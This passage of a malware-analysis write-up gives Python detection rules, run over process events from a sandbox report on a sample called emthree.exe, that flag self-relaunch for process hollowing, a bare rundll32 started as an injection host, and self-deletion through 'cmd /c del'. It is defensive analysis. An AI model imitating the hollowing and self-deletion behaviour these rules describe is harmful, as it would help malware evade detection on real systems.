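def at(hhmmss: str) -> datetime:
    """Every entry above has start date 27/11/2020."""
    return datetime.strptime("27/11/2020 " + hhmmss, "%d/%m/%Y %H:%M:%S")


# Constructed from the six "System Behavior" entries; the last event is a
# benign rundll32 launch made up for contrast and is not from the report.
EVENTS = [
    ProcStart(at("06:36:03"), r"C:\Users\user\Desktop\emthree.exe",
              r"'C:\Users\user\Desktop\emthree.exe'", True),
    ProcStart(at("06:36:10"), r"C:\Users\user\Desktop\emthree.exe", "{path}", True),
    ProcStart(at("06:36:12"), r"C:\Windows\explorer.exe", "", False),
    ProcStart(at("06:36:25"), r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe", True),
    ProcStart(at("06:36:29"), r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\emthree.exe'", True),
    ProcStart(at("06:36:30"), r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
    ProcStart(at("06:40:00"), r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL", False),
]

# First token of a command line (quoted or bare image path), then the arguments.
FIRST_TOKEN_RE = re.compile(r"""^\s*("[^"]*"|'[^']*'|\S+)\s*(.*)$""", re.S)
# "del <path>" at the end of a command line; the path may be quoted either way
# (the report renders double quotes as single quotes).
DEL_RE = re.compile(r"""\bdel\b\s+(['"]?)([^'"]+?)\1\s*$""", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Everything after the image path on the command line; '' when there is nothing."""
    m = FIRST_TOKEN_RE.match(cmdline)
    return m.group(2).strip() if m else ""


def detect(events, window_seconds: int = 30) -> list:
    """Apply the three rules in start-time order; return (start, rule, detail) tuples."""
    findings = []
    ordered = sorted(events, key=lambda e: e.start)
    for i, ev in enumerate(ordered):
        earlier = ordered[:i]
        # Rule 1: the same image starts again shortly after an earlier instance.
        # A launcher creating a suspended copy of itself to hollow looks exactly like this.
        if any(p.path.lower() == ev.path.lower()
               and (ev.start - p.start).total_seconds() <= window_seconds
               for p in earlier):
            findings.append((ev.start, "self_relaunch", ev.path))
        # Rule 2: rundll32.exe with no DLL argument has no legitimate work to do;
        # a bare instance exists only to receive injected code.
        if basename(ev.path) == "rundll32.exe" and arguments(ev.cmdline) == "":
            findings.append((ev.start, "rundll32_without_dll", ev.cmdline))
        # Rule 3: cmd.exe deleting the image of a process that already ran.
        m = DEL_RE.search(ev.cmdline)
        if basename(ev.path) == "cmd.exe" and m:
            target = m.group(2).strip()
            if any(p.path.lower() == target.lower() for p in earlier):
                findings.append((ev.start, "self_delete_of_prior_image", target))
    return findings


if __name__ == "__main__":
    for start, rule, detail in detect(EVENTS):
        print(start.strftime("%H:%M:%S"), rule, detail)
```

On the events above this yields exactly three findings, at 06:36:10, 06:36:25 and 06:36:29, and nothing for explorer.exe, conhost.exe or the benign rundll32 call. Rule 1 on its own is noisy in environments where updaters or installers re-execute themselves; in this run it is corroborated by rule 3 hitting the same path nineteen seconds later, and by the report's own language classification flipping from .NET to native between the two emthree.exe instances, which is the hollowed memory image seen from the sandbox side.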

                                          Disassembly

                                          Code Analysis
